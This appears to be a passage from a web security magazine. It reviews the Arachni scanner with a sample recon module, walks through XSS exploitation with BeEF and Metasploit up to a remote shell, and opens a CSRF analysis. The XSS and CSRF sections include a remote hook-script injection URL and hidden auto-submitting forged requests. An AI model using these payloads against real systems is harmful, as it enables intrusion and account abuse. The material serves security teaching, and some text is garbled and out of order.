Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
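The BDD workflow described above can be illustrated with a small, self-contained sketch. This is a hedged example, not Paolo Perego's actual test bed: the sanitize helper and the expectations are hypothetical stand-ins for an application's filtering policy, written as plain Ruby assertions so it runs without RSpec or Cucumber installed.

```ruby
require 'cgi'

# Hypothetical filtering policy: HTML-escape all user input.
def sanitize(input)
  CGI.escapeHTML(input.to_s)
end

# Behaviour-style scenarios: each expectation models how the code
# must deal with malformed input, as a WAPT report would demand.
malformed = "<script>alert(1)</script>"

raise 'filtering policy not implemented' if sanitize(malformed).include?('<script>')
raise 'benign input must pass through'   if sanitize('hello') != 'hello'

puts sanitize(malformed)
# => &lt;script&gt;alert(1)&lt;/script&gt;
```

In an RSpec test bed these raise statements would become expect(...) examples, but the idea is the same: the scenario fails until the developers implement the policy.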
WEB APP VULNERABILITIES
Pulling the Legs of Arachni
Arachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos "Zapotek" Laskos. It got quite a good score for the detection of Cross-Site Scripting and SQL Injection issues in the recently publicised vulnerability scanner benchmark by Shay Chen.

Arachni is not a so-called inspection proxy, such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open Web Application Security Project (OWASP). Those tools are really meant to be used by a skilled consultant doing manual investigations of the application. Arachni can better be compared with commercial online scanners, which are pointed at the application and produce a report with no further interaction by the user.

Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and must choose the best combination of tools for the job at hand. Is Arachni worthwhile? Time for an in-depth review.

Under the Hood
According to the documentation, Arachni offers the following:

• Simplicity: everything is simple and straightforward, from a user's or a component developer's point of view.
• A stable, efficient and high-performance framework: Arachni allows custom modules, reports and plug-ins, and developers can easily use the advanced framework features without knowing the nitty-gritty details.

Table 1. Overview of the audit and reconnaissance modules included with Arachni

Audit modules:
• SQL injection
• Blind SQL injection using rDiff analysis
• Blind SQL injection using timing attacks
• CSRF detection
• Code injection (PHP, Ruby, Python, JSP, ASP.NET)
• Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
• LDAP injection
• Path traversal
• Response splitting
• OS command injection (*nix, Windows)
• Blind OS command injection using timing attacks (*nix, Windows)
• Remote file inclusion
• Unvalidated redirects
• XPath injection
• Path XSS
• URI XSS
• XSS
• XSS in event attributes of HTML elements
• XSS in HTML tags
• XSS in HTML script tags

Recon modules:
• Allowed HTTP methods
• Back-up files
• Common directories
• Common files
• HTTP PUT
• Insufficient Transport Layer Protection for password forms
• WebDAV detection
• HTTP TRACE detection
• Credit card number disclosure
• CVS/SVN user disclosure
• Private IP address disclosure
• Common backdoors
• .htaccess LIMIT misconfiguration
• Interesting responses
• HTML object grepper
• E-mail address disclosure
• US Social Security Number disclosure
• Forceful directory listing
We can vouch that both the simplicity and performance goals have been attained by Arachni. Since the framework is still under heavy development, stability is sometimes lacking, but at no time did this interfere with our vulnerability assessments.

Arachni is highly modular, both from an architecture point of view and from a source code point of view. The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan. The connection to these dispatchers can be secured by SSL encryption and certificate-based authentication. One dispatcher can handle multiple clients, and multiple dispatchers can share a load and communicate with each other to optimise and speed up the scanning process.

The asynchronous scanning engine supports both HTTP and HTTPS and has pause/resume functionality. Arachni supports upstream proxies (SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0) as well as proxy authentication.

The scanner can authenticate against the web application using form-based authentication, HTTP Basic and Digest authentication, and NTLM.

At the start of every scan a crawler will try to detect all pages. In version 0.3 this was optional, but since version 0.4 the crawler always runs at the start of the scan. The crawler has filters for redundant pages, based on regular expressions and counters, and can include or exclude URLs based on regular expressions. Optionally, the crawler can also follow subdomains. There is also an adjustable link count and redirect limit.

The HTML parser can extract forms, links, cookies and headers. It can gracefully handle badly written HTML thanks to a combination of regular expression analysis and the Nokogiri HTML parser.

Arachni offers a very simple and easy to use module API, enabling a developer to access helper audit methods and write custom modules in a matter of minutes. Arachni already includes a large number of audit and reconnaissance (recon) modules; Table 1 provides an overview.

Arachni offers report management. The following reports can be created: standard output, HTML, XML, TXT, YAML serialization, and the Metareport, which provides Metasploit integration for automated and assisted exploitation.

Arachni has many built-in plug-ins that have direct access to the framework instance. Plug-ins can be used to add any functionality to Arachni. Table 2 provides an overview of the currently available plug-ins.

Installation
Arachni consists of client-side (web or shell) and server-side functionality (the dispatchers). A client talks to one or more dispatchers that will perform the scanning job. New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid). This is great if you want to speed up the scan, or if you want to execute some crazy things like running
Table 2. Included Arachni plug-ins. Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni.

• Passive Proxy: analyses requests and responses between the web application and the browser, assisting in AJAX audits, logging in and/or restricting the scope of the audit
• Form based AutoLogin: performs an automated login
• Dictionary attacker: performs dictionary attacks against HTTP authentication and form-based authentication
• Profiler: performs taint analysis with benign inputs and response time analysis
• Cookie collector: keeps track of cookies while establishing a timeline of the changes
• Healthmap: generates a sitemap showing the health (vulnerability present or not) of each crawled/audited URL
• Content-types: logs content-types of server responses, aiding in the identification of interesting (possibly leaked) files
• WAF (Web Application Firewall) Detector: establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
• Metamodules: loads and runs high-level meta-analysis modules pre/mid/post-scan:
  – AutoThrottle: dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilization
  – TimeoutNotice: provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with; it also points out the danger of DoS (Denial-of-Service) attacks against pages that perform heavy-duty processing
  – Uniformity: reports inputs that are uniformly vulnerable across a number of pages, hinting at the lack of a central point of input sanitization
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers.

Let's get our hands dirty and start with the experimental branch (currently at version 0.4), so we can work with the latest and greatest functionality. Another benefit is that this experimental version can work under Windows.

Installation under Linux is quick and easy, but a Windows set-up requires the installation of Cygwin first. Cygwin is a collection of tools that provide a Linux-like environment on Windows, as well as a large part of the Linux APIs. Another possibility is to run Arachni natively on Windows using MinGW (Minimalist GNU for Windows), but at this moment there are too many problems involved with that.
Linux
Installation under Linux is quite straightforward. Open your favourite shell and execute the commands in Listing 1. This will install all source directories in your home directory; change the cd commands if you want the sources somewhere else. In case you need to update to the latest versions, just cd into the three directories above and perform:
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni. If you encounter a Typhoeus-related error while running Arachni, issue:
$ gem clean
Windows
Arachni comes with decent documentation, but I had a chuckle when I read the installation instructions for Windows: Windows users should run Arachni in Cygwin. I knew that this was not going to be a smooth ride. Since v0.3 some changes have been made to the experimental version to make it easier, so here we go.

Please note that these installation instructions start with the installation of Cygwin and all required dependencies.

Install or upgrade Cygwin by running setup.exe. Apart from the standard packages, include the following:

• Database: libsqlite3-devel, libsqlite3_0
• Devel: doxygen, libffi4, gcc4, gcc4-core, gcc4-g++, git, libxml2, libxml2-devel, make, openssl-devel
• Editors: nano
• Libs: libxslt, libxslt-devel, libopenssl098, tcltk, libxml2, libmpfr4
• Net: libcurl-devel, libcurl4
Listing 1. Installation for Linux

$ sudo apt-get install libxml2-dev libxslt1-dev libcurl4-openssl-dev libsqlite3-dev
$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2. Installation for Windows

$ cd
$ git clone git://github.com/eventmachine/eventmachine.git
$ cd eventmachine
$ gem build eventmachine.gemspec
$ gem install eventmachine-1.0.0.beta.4.gem
$ cd
$ git clone git://github.com/Arachni/arachni-rpc.git
$ cd arachni-rpc
$ gem build arachni-rpc.gemspec
$ gem install arachni-rpc-0.1.gem
$ cd
$ git clone git://github.com/Zapotek/arachni.git
$ cd arachni
$ git checkout experimental
$ rake install
Accept the installation of packages that are required to satisfy dependencies. Note that some of your other tools might not work with these libraries or upgrades; in any case, an upgrade of Cygwin usually means recompiling any tools that you compiled earlier.

Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand. First we need to install libffi. Execute the following commands in your Cygwin shell:
$ cd
$ git clone http://github.com/atgreen/libffi.git
$ cd libffi
$ ./configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml. Download the latest stable version of libyaml (currently 0.1.4) from http://pyyaml.org/wiki/LibYAML and move it to your Cygwin home folder (probably C:\cygwin\home\your_windows_id). Execute the following:
$ cd
$ tar xvf yaml-0.1.4.tar.gz
$ cd yaml-0.1.4
$ ./configure
$ make
$ make install
Now we need to compile and install Ruby. Download the latest stable release of Ruby (currently ruby-1.9.2-p290.tar.gz) from http://www.ruby-lang.org and move it to your Cygwin home folder. Execute the following commands in the Cygwin shell:
$ cd
$ tar xvf ruby-1.9.2-p290.tar.gz
$ cd ruby-1.9.2-p290
$ ./configure
$ make
$ make install
From your Cygwin shell, update and install some necessary modules:
$ gem update --system
$ gem install rake-compiler
$ cd
$ git clone http://github.com/djberg96/sys-proctable.git
$ cd sys-proctable
$ gem build sys-proctable.gemspec
$ gem install sys-proctable-0.9.1-x86-cygwin.gem
Finally, we can install Arachni (and the source) by executing the commands from Listing 2 in the Cygwin shell (note that these are the same commands as for the Linux installation).
In case of weird error messages regarding fork during compilation (especially on Vista systems), execute the following in your Cygwin shell:

$ find /usr/local -iname '*.so' > /tmp/localso.lst

Quit all Cygwin shells. Use Windows Explorer to browse to C:\cygwin\bin, right-click ash.exe and choose Run as administrator. Enter in ash:

$ /bin/rebaseall
$ /bin/rebaseall -T /tmp/localso.lst

Exit ash.
Light my Fire
How to fire up Arachni depends on whether you want to use it with the new (since version 0.3) web GUI or simply run everything through the command-line interface. Note that the current web GUI does not support all functionality that is available from the command line.
The GUI can be started by executing the following commands:
$ arachni_rpcd amp
$ arachni_web
After that, browse to http://localhost:4567 and admire the new GUI. You will need to attach the GUI to one or more dispatchers; the dispatcher(s) will run the actual scan.
Figure 1 Edit Dispatchers
If you want to use the command-line interface, just execute:
$ arachni --help
A quick overview of the other screens (Figure 1):

• Start a Scan: start a scan by entering the URL and pressing Launch scan. After a scan is launched, the screen gives an overview of which issues are detected and how far along the process is.
• Modules: enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site Scripting (XSS), SQL Injection (SQLi) and Cross-Site Request Forgery (CSRF), detect hidden features, or simply make lists of interesting items such as email addresses.
• Plugins: plug-ins help to automate tasks. Plug-ins are more powerful than modules and make it possible to script login sequences, detect Web Application Firewalls (WAF), perform dictionary attacks, and more.
• Settings: the settings screens allow you to add cookies and headers, limit the scan to certain directories, and so on.
• Reports: gives access to the scan reports. Arachni creates reports in its own internal format and exports them to HTML, XML or text.
• Add-ons: three add-ons are installed:
  – Auto-deploy: converts any SSH-enabled Linux box into an Arachni dispatcher
  – Tutorial: serves as an example
  – Scheduler: schedules and runs scan jobs at a specific time
• Log: overview of actions taken by the GUI
Your First Scan
We will use both the command line and the GUI. First the command line: start a scan with all modules active. This is extremely easy:

$ arachni http://www.example.com --report=afr:outfile=www.example.com.afr

Afterwards, the HTML report can be created by executing the following:

$ arachni --repload=www.example.com.afr --report=html:outfile=www.example.com.html
That's it! Enabling or disabling modules is of course possible. Execute the following command for more information about the possibilities of the command-line interface:
$ arachni --help
Usually it is not necessary to include all recon modules. Some modules create a lot of requests, making detection of your activities easier (if that is a problem for your assignment) and taking a lot more time to finish. List all modules with the following command:
$ arachni --lsmod
Enabling or disabling modules is easy: use the --mods switch followed by a regular expression to include modules, or exclude modules by prefixing the expression with a dash. Example:

$ arachni --mods=*,-xss_* http://www.example.com

The above loads all modules except those related to Cross-Site Scripting (XSS).
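To make the include/exclude semantics concrete, here is a hedged Ruby sketch of how such wildcard selection can work. It mimics the behaviour described above but is not Arachni's actual implementation, and the module names are illustrative.

```ruby
# Illustrative module list, not Arachni's real registry.
ALL_MODULES = %w[xss xss_path xss_uri sqli csrf code_injection]

# '*' includes everything matching; a leading '-' excludes by pattern.
def select_modules(spec)
  selected = []
  spec.split(',').each do |pat|
    if pat.start_with?('-')
      re = Regexp.new(pat[1..-1].gsub('*', '.*'))
      selected.reject! { |m| m =~ re }
    else
      re = Regexp.new(pat.gsub('*', '.*'))
      selected |= ALL_MODULES.grep(re)
    end
  end
  selected
end

puts select_modules('*,-xss_*').inspect
# => ["xss", "sqli", "csrf", "code_injection"]
```

Note that xss itself survives the -xss_* exclusion, exactly as in the command-line example above: the dash only removes modules whose names match the pattern.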
Using the GUI makes this process even easier. Open the GUI by browsing to http://localhost:4567 and accept the default dispatcher.

The next steps are to verify the settings in the Settings, Modules and Plugins screens. Once you are satisfied, proceed to the Start a Scan screen (Figure 2).

If you want to run a scan against some test applications, visit my blog for a list of deliberately vulnerable applications. Most of these applications can be installed locally or can be attacked online (please read all related FAQs and permissions before scanning a site; in most jurisdictions this is illegal unless permission is explicitly granted by the owner).

After the scan, just go to the Reports screen and download the report in the format you want.

Figure 2. Start a Scan screen
Listing 3. Create your own module

=begin
  Arachni
  Copyright (c) 2010-2011 Tasos "Zapotek" Laskos <tasos.laskos@gmail.com>

  This is free software; you can copy, distribute and modify
  this program under the terms of the GPL v2.0 License
  (See LICENSE file for details)
=end

module Arachni
module Modules

#
# Looks for common directories on the server, based on wordlists
# generated from open source repositories.
#
# More information about the SVNDigger wordlists:
# http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing
#
# The SVNDigger word lists were released under the GPL v3.0 License.
#
# @author Herman Stevens
# @see http://cwe.mitre.org/data/definitions/538.html
#
class SvnDiggerDirs < Arachni::Module::Base

    def initialize( page )
        super( page )
    end

    def prepare
        # keep track of the requests and do not repeat them
        @@__audited ||= Set.new

        @@__directories ||= []
        return if !@@__directories.empty?

        read_file( 'all-dirs.txt' ) {
            |file|
            @@__directories << file unless file.include?( '.' )
        }
    end

    def run
        path = get_path( @page.url )
        return if @@__audited.include?( path )

        print_status( 'Scanning SVNDigger Dirs...' )

        @@__directories.each {
            |dirname|
            url = path + dirname + '/'
            print_status( "Checking for #{url}" )

            log_remote_directory_if_exists( url ) {
                |res|
                print_ok( "Found #{dirname} at " + res.effective_url )
            }
        }

        @@__audited << path
    end

    def self.info
        {
            :name        => 'SVNDigger Dirs',
            :description => %q{Finds directories, based on wordlists
                created from open source repositories. The wordlist
                utilized by this module is vast and will add a
                considerable amount of time to the overall scan time.},
            :author      => 'Herman Stevens <herman.stevens@gmail.com>',
            :version     => '0.1',
            :references  => {
                'Mavituna Security' =>
                    'http://www.mavitunasecurity.com/blog/svn-digger-better-lists-for-forced-browsing',
                'OWASP Testing Guide' =>
                    'https://www.owasp.org/index.php/Testing_for_Old_Backup_and_Unreferenced_Files_(OWASP-CM-006)'
            },
            :targets     => { 'Generic' => 'all' },
            :issue       => {
                :name            => %q{An SVNDigger directory was detected.},
                :description     => %q{},
                :tags            => [ 'svndigger', 'path', 'directory', 'discovery' ],
                :cwe             => '538',
                :severity        => Issue::Severity::INFORMATIONAL,
                :cvssv2          => '',
                :remedy_guidance => %q{Review these resources manually.
                    Check if unauthorized interfaces are exposed
                    or confidential information.},
                :remedy_code     => ''
            }
        }
    end

end
end
end
Create your Own Module
Arachni is very modular and can be easily extended. In the following example we create a new reconnaissance module.

Move into your Arachni source tree and you will find the modules directory; in there you will find two directories, audit and recon. Move into the recon directory, where we will create our Ruby module.

Arachni makes it really easy: if your module needs external files, it will search in a subdirectory with the same name as the module. For example, if you create a svn_digger_dirs.rb module, that module is able to find external files in the modules/recon/svn_digger_dirs subdirectory.
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing. These wordlists are based on directories found in open source code repositories.
If there is a directory that needed to be protected and you forgot about it, it will be found by a scanner that uses these wordlists.
Furthermore, it can be used as a basis for reconnaissance: if a directory or file is detected, this might provide clues about what technology the site is using.
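As a toy illustration of that reconnaissance idea, the sketch below maps discovered paths to technology hints. The patterns and names are hypothetical examples for this article, not part of Arachni.

```ruby
# Hypothetical mapping from path patterns to technology hints.
HINTS = {
  %r{wp-admin|wp-content} => 'WordPress',
  %r{phpmyadmin}i         => 'phpMyAdmin',
  %r{\.svn}               => 'Subversion working copy',
  %r{cgi-bin}             => 'CGI scripts'
}

# Return every technology whose pattern matches the discovered path.
def technology_hints(path)
  HINTS.select { |re, _| path =~ re }.values
end

puts technology_hints('/blog/wp-content/uploads/').inspect
# => ["WordPress"]
```

A real recon pipeline would feed every directory found by the scanner through a (much larger) table like this to build a technology profile of the target.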
Download the wordlists from the above URL. Create a directory modules/recon/svn_digger_dirs and move the file all-dirs.txt from the wordlist archive to the newly created directory.

Create a copy of the file modules/recon/common_directories.rb and name it svn_digger_dirs.rb. Change the code to read as shown in Listing 3.
The code does not need a lot of explanation: it checks whether or not a specific directory exists; if it does, it forwards the name to the Arachni Trainer (which will include the directory in further scans) and creates a report entry for it.
Note that the above code, as well as another module based on the SVNDigger wordlists with filenames, is now part of the experimental Arachni code base.
Conclusion
We used Arachni in many of our application vulnerability assessments. The good points are:

• Highly scalable architecture: just create more servers with dispatchers and share the load. This makes the scanner a lot more responsive and fast.
• Highly extensible: create your own modules, plug-ins and even reports with ease.
• User-friendly: start your scan in minutes.
• Very good XSS and SQLi detection with very few false positives. There are false negatives, but this is usually caused by Arachni not detecting the links to be audited. This weakness in the crawler can be partially offset by manually browsing the site with Arachni configured as a proxy.
• Excellent reporting capabilities, with links provided to additional information and also a reference to the standardised Common Weakness Enumeration (CWE).

Arachni lacks support for the following:

• No AJAX and JSON support
• No JavaScript support

This means that you need to help Arachni find links hidden in JavaScript, e.g. by using it as a proxy between your browser and the web application. You will need a different tool (or use your brain and manual tests) to check for AJAX/JSON-related vulnerabilities in the application you are testing.

Arachni also cannot examine and decompile Flash components, but a lot of tools are at hand to help you with that. Arachni does not perform WAF (Web Application Firewall) evasion, but then again this is not necessarily difficult to do manually for a skilled consultant or hacker.
And why not write your own module or plug-in that implements the missing functionality? Arachni is certainly a tool worth adding to your toolkit.
HERMAN STEVENS
After a 15-year career spanning many roles (developer, security product trainer, information security consultant, Payment Card Industry auditor, application security consultant), Herman Stevens now works and lives in Singapore, where he is the director of his company Astyran Pte Ltd (http://www.astyran.com). Astyran specialises in application security, such as penetration tests, vulnerability assessments, secure code reviews, awareness training and security in the SDLC. Contact Herman through email (herman.stevens@gmail.com) or visit his blog (http://blog.astyran.sg).
In most commercial penetration testing reports, it's sufficient to just show a small alert popup; this shows that a particular parameter is vulnerable to an XSS attack. However, this is not how an attacker would operate in the real world. Sure, he'd use a popup initially to find out which parameter is vulnerable to an XSS attack. Once he's identified that, though, he'll look to steal information by executing malicious JavaScript, or even gain total control of the user's machine.

In this article we'll look at how an attacker can gain complete control over a user's browser, ultimately taking over the user's machine, by using BeEF (a browser exploitation framework).
A Simple POC
To start off, though, let's do exactly what the attacker would do, which is to identify a vulnerability. For simplicity's sake, we'll assume that the attacker has already identified a vulnerable parameter on a page. Here are the relevant files, which you can use on your own web server if you want to try this.
HTML Page

<HTML>
<BODY>
<FORM NAME="test" action="search1.php" method="GET">
Search: <INPUT TYPE="text" name="search">
<INPUT TYPE="submit" name="Submit" value="Submit">
</FORM>
</BODY>
</HTML>
XSS, BeEF and Metasploit Exploitation
Figure 2. BeEF after configuration
Cross-Site Scripting (XSS) is an attack in which an attacker exploits a vulnerability in application code and runs his own JavaScript code in the victim's browser. The impact of an XSS attack is limited only by the potency of the attacker's JavaScript code.
Figure 1. The user enters input in a search box
Server Side PHP Code

<?php
$a = $_GET['search'];
echo "The parameter passed is: $a";
?>

As you can see, it's some very simple code: the user enters something in a search box on the first page, and his input is sent to the server, which reads the value of the parameter and prints it to the screen. If, instead of simple text, the attacker enters a piece of JavaScript into the box, that JavaScript will execute on the user's machine instead of being displayed. The user just has to be tricked into clicking on a link such as: http://localhost/search1.php?search=<script>alert(document.domain)</script>

The screenshot clarifies the above steps (Figure 1).

BeEF – Hook the user's browser
Now, while this example is sufficient to prove that the site is vulnerable to XSS, it's most certainly not where an attacker will stop. An attacker will use a tool like BeEF (Browser Exploitation Framework) to gain more control of the user's browser and machine.

I used an older version of BeEF (0.3.2), as I just wanted to demonstrate what you can do with such a tool; the newer version has been rewritten completely and has many more features. For now, though, extract BeEF from the tarball, copy it into your web server directory, and click a few buttons to configure it. Alternatively, you could use a distribution like BackTrack, which already has BeEF installed. Figure 2 shows how BeEF looks after it is configured.

Instead of clicking on a link that generates a popup box, the user will now be tricked into clicking on a link that tells his browser to connect to the BeEF controller. The URL that the user has to click on is:

http://localhost/search1.php?search=<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>&Submit=Submit

The IP address here is the one on which you have BeEF running. Once the user clicks on the link above, you should see an entry in the BeEF controller window showing that a zombie has connected. You can see this in the Log section on the right-hand side or the Zombie section on the left-hand side. Figure 3 shows a browser connected to the BeEF controller.

Click and highlight the zombie in the left pane and then click on Standard Modules – Alert Dialog. This will result in a little popup box on the victim machine. Figure 4 shows what the attacker sees, and Figure 5 what the victim sees.

So, as you can see, because of BeEF even an unskilled attacker can run code which he does not even understand on the victim's machine and steal sensitive data. Hence it becomes all the more

Figure 3. Connection with the BeEF controller
Figure 4. What the attacker will see
Figure 5. What the victim will see
Figure 6. Defacing the current web page
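One detail the walkthrough glosses over is that a payload like the hook URL above would normally be URL-encoded before being sent to the victim. The following hedged Ruby sketch (not from the original article) shows the encoding step; the host and paths are the example values used in the text.

```ruby
require 'cgi'

# Example BeEF host and hook script taken from the article text.
payload = "<script src='http://192.168.56.101/beef/hook/beefmagic.js.php'></script>"

# URL-encode the payload so the link survives transport intact.
url = "http://localhost/search1.php?search=#{CGI.escape(payload)}&Submit=Submit"
puts url
```

The encoded link behaves identically once the server decodes the search parameter, but it is far less likely to be mangled by mail clients or browsers, which is why attackers encode (or further obfuscate) such URLs in practice.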
important to protect against XSS. We'll have a small section right at the end where I briefly tell you how to mitigate XSS.

I'll quickly discuss a few more examples using BeEF before we move on to using it as a platform for other attacks. The screenshots that follow are all the result of clicking on the various modules available under the Standard Modules menu.
Defacing the Current Web Page
This results in the webpage being rewritten on the victim's browser with the text in the 'DEFACE STRING' box. Try it out (Figure 6).
Detect all Plugins on the User's Browser
There are plenty of other plug-ins inside Beef, under the Standard Modules and Browser Modules tabs, which you can try out for yourself. I won't discuss all of them here, as the principle is the same. What I want to do now, though, is use the user's hooked browser to take complete control of the user's machine itself (Figure 7).
Integrate Beef with Metasploit and get a shell
Edit Beef's configuration files so that it can directly talk to Metasploit. All I had to edit was msf.php, to set the correct IP address. Once this is done, you can launch Metasploit's browser-based exploits from inside Beef.
Figure 7 Detecting plugins on the user browser
Figure 8 Starting Metasploit
Figure 9 The "jobs" command
Figure 10 Metasploit after clicking "Send Now"
Figure 11 Meterpreter window - screenshot 1
Figure 12 Meterpreter window - screenshot 2
Now, first ensure that the zombie is still connected. Then click on Standard Modules – Browser Exploit and configure the exploit as per the screenshot below. We're basically setting the variables needed by Metasploit for the exploit to succeed (Figure 8).
Open a shell and run msfconsole to start Metasploit. Once you see the msf > prompt, click the zombie in the browser and click the Send Now button to send the exploit payload to the victim. You can immediately check if Beef can talk to Metasploit by running the jobs command (Figure 9).
If the victim's browser is vulnerable to the exploit selected (which in this case is the msvidctl_mpeg2 exploit), it will connect back to the running Metasploit instance. Here's what you see in Metasploit a while after you click Send Now (Figure 10).
Once you've got a prompt, you're on that remote system and can do anything you want with the privileges of that user. Here are a few more screenshots of what you can do with Meterpreter. The screenshots are self-explanatory, so I won't say much (Figure 11-13).
The user was apparently logged in with admin privileges, and we could create a user by the name dennis on the remote machine. At this point we have complete control over one machine.
Once we have control over this machine, we can use FTP or HTTP to download various other tools like Nmap, Nessus, a sniffer to capture all keystrokes on this machine, or even another copy of Metasploit, and install them on this machine. We can then use these to port scan an entire internal network or search for vulnerabilities in services running on other machines on the network. Eventually, over a period of time, it is potentially possible to compromise every machine on that network.
Mitigation
To mitigate XSS, one must do the following:
Figure 13 Meterpreter window - screenshot 3
• Make a list of parameters whose values depend on user input and whose resultant values, after they are processed by application code, are reflected in the user's browser.
• All such output must be encoded before displaying it to the user. The OWASP XSS Prevention Cheat Sheet is a good guide for this.
• Whitelist and blacklist filtering can also be used to completely disallow specific characters in user input fields.
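The encoding step can be sketched with a small JavaScript helper; `encodeForHtml` is a hypothetical name, and the five replaced characters follow the OWASP guidance for HTML body contexts:

```javascript
// Minimal output-encoding sketch (hypothetical helper, not from the article):
// neutralizes the characters that let user input break out of an HTML context.
function encodeForHtml(s) {
  return s.replace(/&/g, '&amp;')   // must run first, before entities are added
          .replace(/</g, '&lt;')
          .replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;')
          .replace(/'/g, '&#x27;');
}

console.log(encodeForHtml('<script>alert(1)</script>'));
// -> &lt;script&gt;alert(1)&lt;/script&gt;
```

With this applied before output, the payload from the earlier example is rendered as inert text instead of being executed.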
Conclusion
In a nutshell, we can conclude that if even a single parameter is vulnerable to XSS, it can result in the complete compromise of that user's machine. If the XSS is persistent, the number of users that could potentially be in trouble increases. So while XSS does involve some kind of user interaction, like clicking a link or visiting a page, it is still a high-risk vulnerability and must be mitigated throughout every application.
ARVIND DORAISWAMY
Arvind Doraiswamy is an information security professional with 6 years of experience in system, network and web application penetration testing. In addition, he freelances in information security audits, trainings and product development (Perl, Ruby on Rails), while spending a lot of time learning more about malware analysis and reverse engineering.
Email: arvinddoraiswamy@gmail.com
LinkedIn: http://www.linkedin.com/pub/arvind-doraiswamy/39/b21/332
Other writings: http://resources.infosecinstitute.com/author/arvind and http://ardsec.blogspot.com
References
• http://www.technicalinfo.net/papers/CSS.html
• https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://beefproject.com
In simple words, CSRF is when an evil website posts a new status to your Twitter account while your Twitter login session is still active.
CSRF Basics
A simple example of this is the following hidden HTML code inside the evil.com webpage:
<img src="http://twitter.com/home?status=evil.com"
style="display:none">
Many web developers use POST instead of GET requests to avoid this kind of malicious attack. But this approach is useless, as shown by the following HTML code used to bypass that kind of protection (Listing 1).
Useless Defenses
The following are the weak defenses:
• Only accept POST: this stops simple link-based attacks (IMG, iframes, etc.), but hidden POST requests can be created within frames, scripts, etc.
• Referrer checking: some users prohibit referrers, so you cannot simply require referrer headers; techniques to selectively create HTTP requests without referrers also exist.
• Requiring multi-step transactions: CSRF attacks can simply perform each step in order.
Defense
The approaches used by many web developers are CAPTCHA systems and one-time tokens. CAPTCHA systems are widely used, but asking a user to type in the text from a CAPTCHA image every time he submits a form might make him stop visiting your website. This is why web sites use one-time tokens. Unlike the CAPTCHA system, one-time tokens are unique values stored in a
Cross-site Request Forgery
IN-DEPTH ANALYSIS • CYBER GATES • 2011
Cross-Site Request Forgery (CSRF for short) is a web application vulnerability that allows a malicious website to send unauthorized requests to a vulnerable website using the currently active session of an authorized user.
Listing 1 HTML code used to bypass the protection
<div style="display:none">
<iframe name="hiddenFrame"></iframe>
<form name="Form" action="http://site.com/post.php"
      target="hiddenFrame"
      method="POST">
<input type="text" name="message" value="I like www.evil.com" />
<input type="submit" />
</form>
<script>document.Form.submit()</script>
</div>
index.php (victim website)
And the webpage which processes the request and stores the message only if the given token is correct:
post.php (victim website)
In-depth Analysis
In-depth analysis shows that an attacker can use an advanced version of the framing method to perform the task and send POST requests without guessing the token. The following is a real scenario (Listing 4):
index.php (evil website)
For security reasons, the same origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content, and the browser throws the following exception:
Permission denied to access property 'document'
when code like the following tries to read the token from a framed page:
var token = window.frames[0].document.forms['messageForm'].token.value
A browser's settings are not hard to modify, so the best way to achieve web application security is to secure the web application itself.
Frame Busting
The best way to protect web applications against CSRF attacks is using FrameKillers with one-time tokens. FrameKillers are small pieces of JavaScript code used to protect web pages from being framed:
<script type="text/javascript">
if(top != self) top.location.replace(location);
</script>
A FrameKiller consists of a conditional statement and a counter-action statement.
Common conditional statements are the following:
if (top != self)
if (top.location != self.location)
if (top.location != location)
if (parent.frames.length > 0)
if (window != top)
if (window.top !== window.self)
if (window.self != window.top)
if (parent && parent != window)
if (parent && parent.frames && parent.frames.length > 0)
if ((self.parent && !(self.parent === self)) && (self.parent.frames.length != 0))
webpage form's hidden field and in a session at the same time, so the two can be compared after the form is submitted.
Subverting one-time tokens is usually attempted with brute force attacks. Brute forcing one-time tokens is worthwhile for an attacker only if the token mechanism is widely used by web developers. For example, the following PHP code:
<?php
$token = md5(uniqid(rand(), TRUE));
$_SESSION['token'] = $token;
?>
Defense Using One-time Tokens
To understand better how this system works, let's take a look at a simple webpage which has a form with a one-time token (Listing 2).
Listing 2 Wrong token
<?php session_start(); ?>
<html>
<head>
<title>GOOD.COM</title>
</head>
<body>
<?php
$token = md5(uniqid(rand(), true));
$_SESSION['token'] = $token;
?>
